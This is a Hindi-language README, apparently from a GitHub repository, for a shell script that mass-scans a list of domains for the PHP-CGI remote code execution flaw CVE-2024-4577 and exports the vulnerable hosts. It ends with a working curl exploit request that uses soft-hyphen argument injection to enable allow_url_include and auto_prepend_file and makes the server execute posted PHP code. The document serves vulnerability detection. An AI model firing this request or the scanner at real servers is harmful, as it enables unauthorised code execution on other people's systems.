
CVE-2024-4577 PHP रिमोट कोड एक्सीक्यूशन भेद्यता के लिए डोमेन स्कैन करने हेतु शेल स्क्रिप्ट, तैयार किए गए POST अनुरोधों के माध्यम से, मैन्युअल सत्यापन के लिए संवेदनशील लक्ष्यों को निर्यात करती है।
यह स्क्रिप्ट CVE-2024-4577 द्वारा वर्णित भेद्यता की जाँच करने के लिए डिज़ाइन की गई है, जिसमें कुछ PHP कॉन्फ़िगरेशनों का दोहन करके दूरस्थ रूप से मनमाना कोड निष्पादित किया जाता है। यह डोमेन की सूची में निर्दिष्ट एंडपॉइंट्स पर POST अनुरोध भेजता है और जाँचता है कि प्रतिक्रिया भेद्यता को इंगित करती है या नहीं।
GNU Parallel इंस्टॉल करें:
sudo apt-get install parallel
रिपॉजिटरी को क्लोन करें: इस रिपॉजिटरी को Git का उपयोग करके अपने स्थानीय मशीन पर क्लोन करें:
git clone https://github.com/Yukiioz/CVE-2024-4577.git
रिपॉजिटरी में जाएँ: क्लोन किए गए निर्देशिका में जाएँ:
cd CVE-2024-4577
डोमेन सूची तैयार करें: जाँच करने के लिए डोमेन की सूची वाली एक टेक्स्ट फ़ाइल बनाएँ। प्रत्येक डोमेन एक नई लाइन पर होना चाहिए। उदाहरण के लिए:
https://example1.com
https://example2.com
https://example3.com
स्क्रिप्ट चलाएँ:
स्क्रिप्ट CVE-2024-4577.sh को डोमेन सूची फ़ाइल के पथ को तर्क के रूप में देते हुए निष्पादित करें:
./CVE-2024-4577.sh live-subdomains.txt | tee script.log
आउटपुट की समीक्षा करें:
स्क्रिप्ट प्रत्येक डोमेन की जाँच करते समय प्रगति जानकारी प्रदर्शित करेगी। यदि कोई डोमेन भेद्य पाया जाता है, तो उसे लाल रंग में हाइलाइट किया जाएगा। स्क्रिप्ट भेद्य डोमेन की एक सूची को vulnerable_domains.txt नामक फ़ाइल में निर्यात भी करेगी।
vulnerable_domains.txtस्क्रिप्ट भेद्य डोमेन की एक सूची को vulnerable_domains.txt नामक फ़ाइल में निर्यात करती है। इस फ़ाइल में भेद्य डोमेन की एक सरल सूची होती है, प्रत्येक डोमेन एक नई लाइन पर होता है। मैन्युअल रूप से पुष्टि करने के लिए, डोमेन पर लक्ष्य एंडपॉइंट पर एक POST अनुरोध भेजने के लिए curl कमांड का उपयोग करें। https://dev.example.com/test.php को लक्ष्य डोमेन पर वास्तविक एंडपॉइंट से बदलें।
curl -X POST https://dev.example.com/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input \
-H "User-Agent: curl/8.3.0" \
--data "<?php phpinfo(); ?>"